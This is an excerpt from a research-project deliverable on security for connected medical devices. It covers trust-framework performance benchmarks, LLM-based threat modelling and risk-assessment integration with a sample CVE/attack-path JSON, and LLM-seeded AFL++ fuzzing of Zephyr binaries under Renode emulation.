In addition to the runtime environment the TAF runs on (i. e. server vs. Raspberry Pi), the testbed consisted of two additional, dedicated machines with a setup identical to the *server*: a Kafka broker and a client generating and inducing the workload. For the broker, we used Apache Kafka 3.7.1 in the default configuration. The workload was created using `xk6-kafka 0.31.1`,

Not all of the hypothetical $2 \times 4 \times 2 \times 2$ setups had been explored. Instead, the trust model had only been assigned to the runtime environment while the in-ambulance trust model had only been used on the Raspberry Pi. We also capped the maximum load at a rate of 2,560 updates per second for the in-ambulance setup.

We have deployed the second version of the ENTRUST TAF component using a configuration that featured the internal TLEE and a thread pool size equivalent to the corresponding system architecture of the runtime environment. Debugging outputs and the interactive web frontend had been disabled in the evaluation builds.

For each configuration of the evaluation, we reset the testing environment, deployed the TAF, and then induced the target workload (i. e. evidence update messages) for 60 seconds after a warm-up phase that we excluded from the measurements. Within the 60 seconds, we measured and collected the processing latency for *all* incoming evidence updates using `/usr/bin/time` and `perf`, respectively. We also controlled the actual Kafka message consumption rate at the TAF to make sure that the actual throughput is kept. After the collection, we analyzed the distribution of latency measurements. In addition, we measured mean CPU utilization and memory consumption for the TAF during these runs.

6.9.3 Experiments & Outcomes

In summary, measurements had been conducted for the following run configurations for the in-ambulance trust model:

- Raspberry Pi x DYNAMIC@0.0.1 x 16 ambulances x 1/s updates
- Raspberry Pi x DYNAMIC@0.0.1 x 16 ambulances x 10/s updates
- Raspberry Pi x DYNAMIC@0.0.1 x 64 ambulances x 1/s updates
- Raspberry Pi x DYNAMIC@0.0.1 x 64 ambulances x 10/s updates
- Raspberry Pi x DYNAMIC@0.0.1 x 256 ambulances x 1/s updates
- Raspberry Pi x DYNAMIC@0.0.1 x 256 ambulances x 10/s updates

Likewise, the evaluation of the central trust model was conducted using the following runs:

- Server x DYNAMIC@0.0.1 x 64 ambulances x 1/s updates
- Server x DYNAMIC@0.0.1 x 64 ambulances x 10/s updates
- Server x DYNAMIC@0.0.1 x 256 ambulances x 1/s updates
- Server x DYNAMIC@0.0.1 x 256 ambulances x 10/s updates
- Server x DYNAMIC@0.0.1 x 1,024 ambulances x 1/s updates
- Server x DYNAMIC@0.0.1 x 1,024 ambulances x 10/s updates

The collected latency measurements have resulted in the following median (p50) and p99 processing times, as shown on in 6.5 and 6.4.

Setup	Proc. Times (ms)		Resource Usage	
	p50	p99	CPU Util.	Mem (kB)
16 x 1/s	1.854	2.612	1.50%	21,504
16 x 10/s	1.439	2.304	12.75%	22,548
64 x 1/s	1.746	2.218	5.75%	23,400
64 x 10/s	1.317	9.730	36.75%	24,360
256 x 1/s	1.127	4.737	16.50%	29,580
256 x 10/s	1,385.2	1,681.6	78.75%	45,756

Table 6.4: Measurements on the high end device (Raspberry Pi 3+).

Setup	Proc. Times (ms)		Resource Usage	
	p50	p99	CPU Util.	Mem (kB)
64 x 1/s	0.185	0.279	0.08%	36,480
64 x 10/s	0.093	0.187	0.48%	39,456
256 x 1/s	0.186	0.269	0.29%	40,692
256 x 10/s	0.106	0.276	1.81%	42,164
1024 x 1/s	0.156	0.309	0.96%	43,776
1024 x 10/s	0.949	95.944	5.10%	52,448

Table 6.5: Results for the central server’s measurements using the 24-core server.

6.9.4 Discussion of Results

The evaluation results show that the standalone TAF prototype is able to cope with increasing loads, even when running in resource-constrained environments.

The evaluations show good performance results for small and moderate loads. Concurrently maintaining 256 trust models with a total of 4,608 trust objects and 8,448 trust relationships still yields 99th percentile latencies below 5 ms for 256 updates per

second. Once the update rates exceed 1,000 updates per second, there is a significant increase in CPU utilization and also the average processing latency then exceeds 1 second. This result is in line with our assumptions, as the TAF prototype has neither been optimized for outdated single-board computer architectures, nor does it currently apply load shedding in overload situations (i. e.drop updates to maintain latency thresholds).

The central evaluations indicate that the TAF can easily handle more than thousand parallel trust model instances with update rates above 10,000 updates per second. Here, more than 99% of updates are handled within 100 ms, while half of the updates are processed even within less than 1 ms. At the same time, the memory footprint is negligible and the CPU utilization indicates that the TAF could even handle much more computationally complex updates at similar rates.

That said, we argue that both the runtime performance requirements as well as the scalability requirements have been generally met by our prototype TAF.

As part of the second version of the ENTRUST integrated framework, the goal is to evaluate the federated mode of operation in the smart ambulance use case, and assess the impact of the exchange of trust-related information across the TAF agents, both as it pertains to the accuracy but also the latency of the end-to-end trust calculations.

Chapter 7

Threat Modelling and Software Verification

As detailed in D2.2 [30], *the threat landscape for CMDs operating within medical domain infrastructures is both extensive and ever-evolving, ranging from custom malware and data-tampering in transit to ransomware attacks and exploitation of legacy components*. This highlights the need for a systematic, up-to-date approach to map the full attack surface across all device types. In order to address such types of threats in modern medical domain ecosystems, which are becoming increasingly complex, interconnected, and exposed to sophisticated security threats, **the approach followed by ENTRUST for tackling these challenges involves integrating advanced AI techniques, specifically Large Language Models (LLMs), into the security analysis and assurance process**. Traditional rule-based engines struggle to keep pace with constantly evolving vulnerabilities, misconfigurations, and threat intelligence feeds, particularly when those inputs arrive in different formats such as natural-language reports, JSON schemas, logs, and vulnerability databases. *LLMs can address this issue by absorbing and normalising this heterogeneous data at scale, then rapidly hypothesising coherent attack sequences that a human analyst might overlook*.

One key aspect of this integration is **the use of LLMs to process and reason about attack paths**. The end goal of this LLM-augmented workflow is a *living, prioritized map of high-risk attack paths, each described in human-readable form, quantified for likelihood and impact, and paired with concrete mitigation actions or test-case templates*. This map feeds directly into subsequent assurance stages, such as RTL computation, ensuring that newly discovered or hypothesized threats are rapidly validated, mitigated and continuously monitored in production. In ENTRUST, *Threat Modelling sits at the core of the security assurance pipeline, linking the initial identification of threats to downstream Risk Assessment and mitigation workflows*. As documented in D2.2, **the Threat Modelling component consumes data from the Risk Assessment**, e.g., network topologies, and from continuous threat-intelligence feeds, and produces a formalized output of assets and potential adversary goals. This is then used by the Risk Assessment component to *quantify the likelihood and impact of multi-stage exploits, ensuring tight interconnectivity between threat discovery and risk quantification*.

In addition, **Attack paths**, which are calculated by Attack Patch Calculator, describe *sequences of actions an attacker could take to exploit vulnerabilities and reach critical assets*. By consuming these paths, LLMs can support security analysts in understanding potential threat vectors, mapping them to system components, and generating meaningful insights. This forms a critical bridge to risk assessment, where we evaluate the likelihood and potential impact of such threats. Once the Threat Modelling has produced the detailed attack landscape, each path annotated with a likelihood score and an impact estimate, the RA module aggregates these into a per-asset risk metric. For a given asset A , RA considers all attack paths \mathcal{P}_A identified by TM and computes a composite risk score $R(A)$, for example by taking the maximum Attack Path Risk Level (APRL) across \mathcal{P}_A or by summing the weighted APRL. Thus, considering all the above, *the ability of LLMs to generalize from large corpora of threat intelligence and software artifacts enables a more proactive and informed approach to threat modelling*. In turn, RA allows TM component to *stay up-to-date with the network assets and the topologies used, allowing for more accurate threat scenarios*.

Alongside this, **Software Verification** plays a crucial role in the overall security lifecycle. While threat modelling helps to anticipate attacker behaviour and identify high-risk components, *software verification focuses on uncovering bugs, inconsistencies, and vulnerabilities within the system itself, before they can be exploited*. This includes both **functional errors** and **security-relevant flaws** such as input validation weaknesses, memory safety violations, or improper access controls. Its operation is based on **fuzzing**, which is an *automated software testing technique that involves feeding a program with a large volume of random, invalid, or unexpected data (called "fuzz") to identify potential vulnerabilities and defects*. The goal is to uncover threats or weaknesses by causing the software to crash, malfunction, or reveal other unexpected behaviours when presented with various types of unexpected or unintended inputs. In this regard, the core innovation introduced in this deliverable is *the*

use of LLMs in order to analyse the source code and synthesise such inputs, aiming to cover diverse execution paths that are more likely to trigger unexpected behaviour in the source program.

Throughout the remainder of this Chapter, we provide the updated descriptions of both the Threat Modelling and Software Verification components, and we provide technical details regarding their architecture, implementation, action workflows, as well as evaluation and benchmarking results.

7.1 Threat Modelling

In this section, the updates and integrations that underpin our threat-modelling capability are presented. We begin by presenting the motivation behind the integration of the GROQ Model Provider into the ENTRUST Threat Modelling component as an additional model provider and its core advantages, namely its high-performance tensor streaming architecture, the supported LLMs, before describing how we leverage Apache Kafka for scalable, low-latency event streaming. Finally, we detail our Risk Assessment Integration, showing how synchronous polling and asynchronous event-driven pipelines interact with the Risk Assessment API to discover assets, instantiate threat models, and compute multi-stage attack paths across the network topology.

7.1.1 Groq Model Provider

In D3.2 [25], we outlined the motivation behind the approach in the design and implementation of the Threat Modelling component of ENTRUST, particularly the use of **generative AI techniques** while also leveraging **pre-trained models**. Specifically, the use of LLMs enables the construction of the threat landscape affecting a particular CMD in a clear and easily understandable format, in a manner that enables security administrators to formulate better defence strategies, and facilitates the ENTRUST framework to effectively utilise the appropriate mitigation measures against the identified threat landscape. In this regard, *the use of pre-trained models offers significant advantages, such as the ability to bypass the need for training models from scratch*, as they are already trained on extensive and diverse datasets that capture a wide array of linguistic patterns. This is especially pertinent in the case of CMDs, which often operate in resource-constrained environments. Therefore, the use of pre-trained models is not only able to **significantly increase efficiency in real-time threat assessment and decision-making**, but it also allows us to **skip time-consuming training phases**, thus accelerating development timelines.

In this regard, in D3.2 [25], we detailed the approach followed by ENTRUST, which leveraged the **Ollama** standalone LLM manager, which enables downloading, managing, and exposing LLMs as APIs. This approach was enhanced with the use of **Retrieval-Augmented Generation (RAG)**, which is an advanced approach in natural language processing that combines **retrieval**, which involves finding relevant information from a knowledge base or external sources, and **generation**, which focuses on synthesizing that information into a coherent and contextually appropriate response. This hybrid approach eventually enhances the quality and relevance of the generated text, thus enabling the construction of a more comprehensive threat landscape. Thus, in order to implement the Threat Modelling component, as documented in D3.2, we exposed a Llama2-13b model via Ollama to perform RAG-based threat modelling. However, while this approach demonstrated promising results and compared favourably to existing approaches in the experimental activities carried out in the context of D6.1 [?], some issues were encountered that necessitated the investigation of improvements to this approach. Specifically, since Ollama ran on our existing on-premises which were hardware—limited in GPU memory and compute capacity—*inference latency often exceeded several seconds per query, and only smaller or quantized models could be deployed without exhausting resources.*

In order to address these issues, we investigated the use of **GROQ** [41], which is an *advanced AI model provider known for its high-performance inference capabilities, leveraging specialized hardware and optimized architectures*. The GROQ model is designed for efficient deployment of LLMs in various applications, including natural language processing, digital forensics, and malware analysis. By using a unique **tensor streaming architecture**, GROQ offers *significant speed and performance improvements over traditional model providers*. GROQ also offers a **diverse range of pre-trained models**, including large-scale language models for **Natural Language Processing (NLP)** and computer vision models for image recognition. These models are optimized for low-latency and high-throughput inference, making them suitable for real-time applications. The availability of a rich catalog of pre-trained models on the GROQ platform allows us to bypass lengthy data-collection and training cycles. Instead of building custom NLP models from scratch, we can immediately leverage high-capacity language models to parse unstructured threat intelligence and extract the critical artifacts that are used to generate threat landscape.

Considering all the above, in contrast to the previously employed Ollama-based approach, the GROQ Model Provider uses a custom tensor-streaming architecture, leveraging on-chip memory and parallel tensor pipelines achieving faster response times. This design also allows multiple, large-parameter models to run concurrently, eliminating the hardware bottlenecks we faced with Ollama and enabling real-time, high-throughput attack-path hypothesis generation.

7.1.1.1 Models

As described in the previous section, the GROQ model provider offers a large array of pre-trained models, which can be leveraged in order to offer low latency and high throughput to real-time applications. Specifically, GROQ provides access to a variety of AI models via its GroqCloud platform, optimized for high-performance inference tasks. The models offered by GROQ can be seen in Table 7.1. These will provide the basis for the implementation of the ENTRUST approach, through the appropriate selection of models offered by GROQ.

Table 7.1: GROQ Model Offerings

Model	Provider	Context Window	Max Tokens / Size
Gemma2-9B-IT	Google	8,192	-
LLaMA 3.3-70B Versatile	Meta	128K	32,768
LLaMA 3.1-8B Instant	Meta	128K	8,192
LLaMA Guard 3-8B	Meta	8,192	-
LLaMA3-70B-8192	Meta	8,192	-
LLaMA3-8B-8192	Meta	8,192	-
Whisper Large V3	OpenAI	-	Up to 25 MB
Whisper Large V3 Turbo	OpenAI	-	Up to 25 MB
Distil-Whisper Large V3 EN	HuggingFace	-	Up to 25 MB
Allam-2-7B	SDAIA	4,096	-
DeepSeek R1 Distill LLaMA-70B	DeepSeek	128K	-
Meta LLaMA 4 Maverick 17B 128E Instruct	Meta	131,072	8,192
Meta LLaMA 4 Scout 17B 16E Instruct	Meta	131,072	8,192
Mistral Saba 24B	Mistral	32K	-
PlayAI TTS	Playht, Inc	10K	-
PlayAI TTS Arabic	Playht, Inc	10K	-
Qwen-QWQ-32B	Alibaba Cloud	128K	-
Compound Beta	GROQ	128K	8,192
Compound Beta Mini	GROQ	128K	8,192

As can be seen in Table 7.1, most of the models offered by GROQ are based on open-source architectures, such as Meta’s LLaMA series. This reliance on open-source models provides significant advantages, including enhanced transparency, reproducibility, and community-driven improvements. Users can independently verify the model architectures, evaluate their performance, and even modify them to suit specific use cases, fostering greater trust and confidence in the models’ outputs.

7.1.1.2 Motivation

Here, we provide further details on the GROQ model provider, in order to better illustrate the motivation behind its use in the Threat Modelling component of ENTRUST. The increasing demand for applications leveraging LLMs has highlighted the challenges associated with deploying these models, especially in environments with limited computational resources. High-performance LLMs, such as those with billions of parameters, typically require substantial hardware resources, making them impractical for many organizations and independent developers. GROQ addresses these challenges by providing a highly optimized infrastructure that allows even resource-constrained environments to efficiently run LLM-based applications. For example, when a new firmware vulnerability is published for the Bluetooth module in ECG gateway, the module returns a complete threat landscape, within milliseconds, showing how an adversary could chain the Bluetooth exploit to pivot onto other assets. This approach eliminates the need for local GPU hardware or rack-mounted servers, sparing the hospital IT team from procuring or maintaining any specialized equipment, leading to both faster performance and lower costs.

One of the primary motivations for using GROQ is its ability to deliver faster response times. This is important in the medical domain where safety-critical operations need to be performed in a timely manner for the efficient provision of healthcare. By leveraging specialized hardware and optimized architectures, GROQ significantly reduces the latency associated with LLM inference, making it suitable for real-time applications, such as digital forensics, malware analysis, and other latency-sensitive

tasks. This performance advantage is particularly beneficial when processing large datasets or performing complex analytical operations.

Furthermore, GROQ supports a wide range of open-source models, including those from Meta’s LLaMA series. The availability of open-source models provides users with greater transparency, allowing them to inspect and modify model architectures according to their needs. This openness, when combined with the modular design of frameworks like LangChain, enables users to easily switch between models. For instance, users can start with a cloud-hosted model on GROQ but seamlessly transition to a locally hosted model if needed, providing flexibility in deployment options.

Another key motivation for choosing GROQ is its ability to support large-scale models, such as the 70B parameter LLaMA model from Meta, allowing for more accurate attack scenarios. Deploying such a model on conventional infrastructure would typically require multiple high-end GPUs, extensive memory, and sophisticated configuration. However, GROQ’s optimized architecture allows for the efficient deployment of these massive models without requiring excessive hardware resources. This capability democratizes access to cutting-edge LLMs, enabling more organizations to benefit from advanced AI capabilities without incurring prohibitive infrastructure costs.

In summary, the motivation for using GROQ is driven by its ability to:

- Enable high-performance LLMs even on resource-constrained infrastructure.
- Achieve faster response times due to optimized inference.
- Provide flexibility through the use of open-source models and easy model switching with LangChain.
- Allow the deployment of large models, such as LLaMA 70B, without significant hardware investments.

7.1.2 Risk Assessment Integration

As previously outlined, in the context of the ENTRUST framework, there is a strong collaboration and bidirectional relationship between the **Threat Modelling (TM)** and the **Risk Assessment (RA)** components. Specifically, on the one hand, the Threat Modelling component relies on the Risk Assessment component in order to obtain information pertaining to the asset topology, so that it can consider domain-specific threats based on the identified attack paths, i.e., the capability for an attacker to obtain illicit access to a specific asset by using a different asset as an entry point. Conversely, the Risk Assessment component relies on the threat landscape produced by the Threat Modelling component so that it can be considered in the calculation of the **Required Trust Level (RTL)**, which relies on a variety of factors, such as the types of identified threats, their likelihood and impact, as well as the available mitigation measures. In this regard, the RA should be able to receive instantiations and knowledge of attack paths, so that they can be considered into the calculation of the RTL. Note that communication between the TM and RA components is performed over **REST API**.

Considering the above, in order to ensure continuous and comprehensive security coverage of your network topology, the Threat Modelling component achieves the required interplay with the Risk Assessment component by leveraging the Risk Assessment API in two complementary modes, **synchronous polling** and **asynchronous event-driven**, to discover assets, instantiate threat models, and react to changes in real time. These two modes enable both aforementioned types of communication, specifically both the capability of the RA to retrieve the threat landscape produced by TM to calculate the RTL, and the capability of the TM to leverage the risk insights produced by the RA in order to generate context-specific attack scenarios for each asset.

In order to initiate communication with the RA component, the TM component begins by querying the Risk Assessment API’s Asset Resource, specifically `GET /api/v1/assets` to retrieve the full list of devices (assets) in the topology, provided by the system administrator, and includes information on the interconnectivity between assets. The TM component then creates a *threat model for each device, taking into account the full network topology in order to generate attack paths*. These attack paths may also represent **compound attacks**, where an attacker chains together multiple vulnerabilities to move laterally across assets and launch more sophisticated multi-stage exploits. By analysing the **relationships between assets**, which may be between SW-SW, SW-HW or HW-HW components, and the potential **vulnerability sequences**, the Threat Modelling can identify complex attack vectors that would be missed by isolated assessments. In Listing 7.1, we provide an example of output provided by the Threat Modelling API.

```
1 [
2   {
3     "id": "uuid-20",
4     "name": "Zephyr RTOS v3.3.0",
5     "cpe": "cpe:2.3:o:zephyrproject:zephyr:3.3.0:*:*:*:*:*:*:*",
6     "vulnerabilities": [
```



```

7   {
8     "id": "CVE-2023-4424",
9     "name": "BLE Advertising Packet Buffer Overflow",
10    "description": "A malicious BLE device can send a malformed advertising
11                  packet that triggers a buffer overflow in Zephyr's BLE stack, resulting
12                  in denial of service or potential remote code execution.",
13    "cvss_vector": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
14    "cpes": [
15      "cpe:2.3:o:zephyrproject:zephyr:3.3.0:*:*:*:*:*:*"
16    ],
17    "threats": [
18      {
19        "id": "uuid-21",
20        "name": "Buffer Overflow via Malformed BLE Packet",
21        "description": "Crafted advertising packets overflow the BLE stack
22                      buffer, crashing the device or enabling code execution.",
23        "attributes": [
24          { "key": "capec", "value": "120" },
25          { "key": "tactic", "value": "Execution" }
26        ]
27      }
28    ],
29  },
30  {
31    "id": "CVE-2023-6881",
32    "name": "FUSE Filesystem Buffer Overflow",
33    "description": "Improper bounds checking in the 'is_mount_point' function
34                  of the FUSE filesystem allows a local attacker to overflow a buffer,
35                  potentially leading to code execution or system crash.",
36    "cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
37    "cpes": [
38      "cpe:2.3:o:zephyrproject:zephyr:3.3.0:*:*:*:*:*:*"
39    ],
40    "threats": [
41      {
42        "id": "uuid-22",
43        "name": "Local Buffer Overflow in FUSE",
44        "description": "Locally crafted file-system operations overflow a
45                      buffer in the FUSE module, leading to potential code execution or
46                      denial of service.",
47        "attributes": [
48          { "key": "capec", "value": "120" },
49          { "key": "tactic", "value": "Execution" }
50        ]
51      }
52    ],
53  },
54  {
55    "id": "CVE-2023-7060",
56    "name": "IP Packet Validation Bypass",
57    "description": "Zephyr's IP stack fails to drop packets with certain
                    loopback source or destination addresses, allowing a remote attacker to
                    cause denial of service.",
58    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
59    "cpes": [
60      "cpe:2.3:o:zephyrproject:zephyr:3.3.0:*:*:*:*:*:*"
61    ],
62    "threats": [
63      {
64        "id": "uuid-23",

```



```

58     "name": "Denial of Service via Malformed IP Packets",
59     "description": "Remote attacker crafts IP packets with loopback
        addresses to trigger a crash or resource exhaustion in the network
        stack.",
60     "attributes": [
61         { "key": "capec", "value": "94" },
62         { "key": "tactic", "value": "Impact" }
63     ]
64 }
65 ]
66 }
67 ],
68 "attributes": [
69 ],
70 "cascading_attacks": [
71     {
72         "asset_id": "uuid-2",
73         "vulnerability_id": "CVE-2023-4424",
74         "threat_id": "uuid-21"
75     },
76     {
77         "asset_id": "uuid-3",
78         "vulnerability_id": "CVE-2023-6881",
79         "threat_id": "uuid-22"
80     },
81     {
82         "asset_id": "uuid-4",
83         "vulnerability_id": "CVE-2023-7060",
84         "threat_id": "uuid-23"
85     }
86 ]
87 }
88 ]

```

Listing 7.1: Threat Modelling JSON response

The output of the API has changed as follows:

- An array of steps that an adversary could take to execute a cascading attack has been added, starting from the endpoint asset (the asset to which this JSON payload pertains).
- Each entry in the array contains at minimum the `assetId` and the `vulnerabilityId`. Where available, the `threatId` is also included to enable calculation of the cascading risk across the entire attack path.

The system is designed to support both synchronous polling and asynchronous event handling. In synchronous mode, Threat Modelling invokes the Risk Assessment API at regular intervals to refresh the asset topology and regenerate attack paths for every device. In asynchronous mode, Risk Assessment notifies the Threat Modelling component whenever the topology changes or when new vulnerabilities are detected, allowing models to be updated and compound attack analyses to run immediately.

7.2 Software Verification

As aforementioned, the core target of the Software Verification component of ENTRUST is to *uncover bugs, inconsistencies, and vulnerabilities within the system itself, before they can be exploited by malicious parties*. The operation of this component is based on **Fuzzing**, which is *a software testing technique that involves feeding a program with invalid, unexpected, or random data to identify potential vulnerabilities and bugs*. In other words, fuzzing is a dynamic analysis method that helps uncover issues like crashes, memory leaks, and security vulnerabilities. *Fuzzing is based on the generation of a large number of diverse inputs and feeding them to the target program*. The program's behaviour is then monitored for any unexpected or abnormal responses, such as crashes, hangs, or incorrect output. These responses can indicate potential vulnerabilities that need to be addressed.

In this Section, we present the updates for the Software Verification module of ENTRUST. We begin by describing how we augment traditional mutation-based fuzzing with large language models to generate intelligent seed inputs, then detail the key advantages and inherent limitations of this hybrid approach. Finally, we evaluate our methodology by applying AFL++ (via Antmicro's fork) in conjunction with Renode-based hardware emulation to ZephyrOS binaries, demonstrating its effectiveness at uncovering faults and achieving deep coverage of RTOS components.

7.2.1 Fuzzing with Application of LLMs

LLMs can process large volumes of source code, understand control-flow and data-flow structures, and identify potentially vulnerable code regions. By doing so, they can generate syntactically and semantically valid inputs that are more likely to trigger meaningful behaviour in the target program. This capability complements traditional mutation-based fuzzers, which often rely on random or format-agnostic input mutations. Thus, as part of the Software Verification process of ENTRUST, *we have employed an LLM for analysing the target source code and synthesising inputs that aim to cover diverse execution paths*. These inputs are then passed to AFL as seed files, allowing the fuzzer to perform further mutation-based exploration. This hybrid approach can accelerate path discovery and improve overall coverage, particularly in structured-input programs. Overall, the integration of LLMs into the fuzzing process introduces both benefits and limitations, which are outlined in the following.

The integration of LLMs into fuzzing workflows introduces several key **advantages that significantly improve both the precision and productivity of traditional fuzzing techniques**, which can be summarised as follows”

- One major benefit is the **semantic understanding** that LLMs bring to the process. Traditional fuzzers often operate blindly, applying random mutations to inputs without understanding their meaning or structure. In contrast, LLMs can interpret the source code to infer valid input formats, preconditions, and expected behaviors. This allows for the generation of test cases that are more likely to be accepted by the program and lead to deeper execution paths.
- Another advantage is the **acceleration of seed input generation**. Generating high-quality initial seeds is critical for effective fuzzing, especially in programs that require specific input formats or protocols. LLMs can analyze code and automatically produce diverse, syntactically valid seeds, reducing the startup time for fuzzers like AFL++ and avoiding inefficient exploration of invalid inputs.
- LLMs also contribute to **increased code coverage and exploration of path diversity**. Because the test cases are generated with some level of logic and intent, they are more likely to exercise conditional branches, edge cases, and error-handling code. This can lead to the discovery of vulnerabilities that are missed by mutation-only fuzzers.
- In addition, **LLMs enhance automation and scalability**. Manually crafting test cases or defining grammars can be time-consuming and domain-specific. LLMs offer a generalizable method for automatically generating test inputs across a wide variety of applications and codebases, reducing the burden on developers and testers.
- Finally, **LLMs are particularly effective when dealing with domain-specific or structured formats**, such as **JSON**, **XML**, or **custom configuration files**. They can generate inputs that conform to the expected structure, increasing the likelihood of successful execution and deeper fuzzing feedback.

Despite these benefits, several **limitations** persist, which need to be taken into consideration when applying LLMs in a Software Verification context with fuzzing. These can be summarised as follows:

- Most notably, **when the target program is only available as a compiled binary without source code access, the utility of LLMs becomes constrained**. Current LLMs are not yet capable of performing robust binary decompilation or understanding obfuscated control flows at the binary level.
- Additionally, **generating inputs for programs with complex binary interfaces or non-textual formats remains a challenge**, especially without detailed knowledge of internal state transitions or expected input structure.
- Furthermore, **LLM-generated test cases can lack the diversity or edge-case representation** typically discovered through feedback-driven fuzzing.

Therefore, while LLMs enhance fuzzing by providing intelligent initial seeds, they are not yet a full substitute for evolutionary fuzzing strategies. Considering all the above, as will be illustrated in the following evaluation section, the use of LLMs in fuzzing can introduce significant benefits to the software verification process, as long as their limitations are adequately considered.

7.2.2 Evaluation

Here, we provide details on the evaluation activities carried out on the Software Verification component of ENTRUST, as well as key takeaways from the application of LLMs in the process. To assess our software verification methodology, we also tested


```

american fuzzy lop ++4.07c {default} (renode_mode/example-uart.resc) [fast]
├─ process timing
│   run time : 0 days, 0 hrs, 1 min, 4 sec
│   last new find : 0 days, 0 hrs, 1 min, 3 sec
│   last saved crash : none seen yet
│   last saved hang : none seen yet
├─ cycle progress
│   now processing : 0.149 (0.0%)
│   runs timed out : 0 (0.00%)
├─ stage progress
│   now trying : havoc
│   stage execs : 30/51 (58.82%)
│   total execs : 9629
│   exec speed : 273.0/sec
├─ fuzzing strategy yields
│   bit flips : 1/104, 0/102, 0/98
│   byte flips : 0/13, 0/11, 0/7
│   arithmetics : 0/728, 0/25, 0/0
│   known ints : 0/69, 0/304, 0/308
│   dictionary : 0/0, 0/0, 0/1, 0/15
│   havoc/splice : 0/7788, 0/0
│   py/custom/rq : unused, unused, unused, unused
│   trim/eff : 27.78%/4, 0.00%
├─ overall results
│   cycles done : 38
│   corpus count : 2
│   saved crashes : 0
│   saved hangs : 0
├─ map coverage
│   map density : 0.31% / 1.00%
│   count coverage : 6.53 bits/tuple
├─ findings in depth
│   favored items : 2 (100.00%)
│   new edges on : 2 (100.00%)
│   total crashes : 0 (0 saved)
│   total tmouts : 0 (0 saved)
├─ item geometry
│   levels : 2
│   pending : 0
│   pend fav : 0
│   own finds : 1
│   imported : 0
│   stability : 23.78%
└─ [cpu000: 18%]
    
```

Figure 7.1: AFL-based fuzzing of Zephyr binaries

ZephyrOS binaries with Antmicro’s AFL++ fork [4]. Our main objective was to **determine the fuzzer’s capacity to reveal defects, provoke unintended behaviours, and achieve significant coverage of critical operating-system components** that are commonly used in connected medical devices.

The core motivation behind the selection of Antmicro’s AFL++ fork was because it offers **important performance and instrumentation enhancements compared to the original AFL**. These include **accelerated shared-memory feedback**, more effective **test-case trimming**, and a broader set of **mutation strategies** that improve both bug detection and code coverage. Moreover, it provides a **ready-to-use Renode harness** implemented in Python. Note that Renode [5] is an open-source simulation framework developed by Antmicro that models embedded hardware at the instruction level. It can emulate multi-node systems, peripherals, buses and microcontrollers, enabling developers to run and debug firmware without requiring physical boards. We configured Renode to mirror the hardware setups commonly found in medical devices running ZephyrOS, including the specific microcontroller cores and peripheral interfaces. With the emulation environment operational, AFL++ generated fuzz inputs that were delivered to the virtual system.

The Renode harness automatically attaches to AFL’s shared-memory bitmap, carries out the fork-server handshake, and installs basic-block hooks on the emulated system bus so that execution counts feed directly into the fuzzer’s coverage map. A complementary driver module reads each test case from the fork-server pipe, injects data into the firmware’s UART interface, and uses simple heuristics (such as end-of-file detection or idle-loop monitoring) to report successful runs or initiate controlled aborts. Since this integration was available out of the box, we were able to concentrate exclusively on measuring the fuzzer’s effectiveness at discovering faults in ZephyrOS.

Real-time emulation feedback allowed us to determine whether the inputs caused crashes, memory corruption or other vulnerabilities in the kernel or its hardware-interaction layers, as illustrated in Figure 7.1. Multiple system utilities, e.g., `echo`, `getline`, and `getchar`, were chosen and built with `west` because they represent common building blocks in software deployed on connected medical devices. Each binary was instrumented with a known fault (for example, the Antmicro patch in the `echo` utility that crashes upon reading the character ‘a’) to measure how quickly AFL++ can discover the defect. The fuzzer was initialized with inputs typical for each binary, e.g., empty files or strings to maximize exploration of each utility’s input handling logic.

As shown in the Figure, our results indicate that with suboptimal seed inputs, the mean time to detect the injected fault is approximately 70 s; however, when using seeds more closely resembling the triggering input, detection latency decreases in proportion to the mutation distance required to reach the bug. Further insight on these results is also provided in the following Section.

7.2.3 Key Takeaways

Based on the experimental results provided in the previous section, it can be observed that the Renode and AFL++ integration enables rapid fault discovery in ZephyrOS binaries. In our experiments, engineered bugs, such as the 'a' crash in echo, were consistently detected in under two minute.

In addition, **seed quality has a significant impact on detection latency**. While arbitrary seeds yield a mean time to fault detection of approximately 70 s, this can be reduced substantially by selecting initial inputs that lie closer, in mutation distance, to the actual triggering input.

Using simple, widely deployed utilities, namely echo, getline, and getchar, provides a controlled benchmarking environment. These console tools allow for effective tuning of harness heuristics and mutation strategies before extending the methodology to more complex ZephyrOS subsystems.

Finally, the instrumentation overhead introduced by Renode's instruction-level emulation remains within acceptable bounds, suggesting strong scalability potential. By running multiple Renode instances in parallel, this approach can be scaled to fuzz larger components and entire firmware images used in connected medical devices.

7.3 Next Steps and Roadmap

Over the coming period, we will complete the integration of the Threat Modelling and Risk Assessment modules. First, asset topology data from a selected use case will be ingested and transformed into detailed attack-path specifications for downstream risk analysis. We will validate both the synchronous polling pipeline, which periodically retrieves the latest asset information, and the asynchronous event-driven pipeline, which responds to real-time topology changes and newly detected vulnerabilities. Throughout these validations, we will monitor processing latency, success rates, and model freshness to ensure that threat-model updates and cascading attack-path computations execute reliably and meet operational requirements. We are also currently in the process of fleshing out the asset topologies of each use case, which will then be fed into the Threat Modelling. Then, the Threat Modelling will perform attack path identification, in order to provide them as input to the Risk Assessment, so that it can leverage this information for the better calculation of the RTL.

In parallel, we will expand our fuzzing efforts by testing binaries provided by our use-case partner. These additional test cases will cover key firmware components and device drivers specific to the partner's environment. Using the same AFL++ and Renode setup, we will generate and inject fuzz inputs into the emulated systems, capture real-time feedback on crashes or anomalous behavior, and gather metrics on fault-detection rates and coverage improvements. We will continue to perform more detailed fuzzing regarding setups based on the Nordic OS, which is the most realistic environment that corresponds to the actual operation of the use case demonstrators. Then, experimental activities on the fuzzing will be carried out and documented in D6.2 [29].

Chapter 8

Conclusions

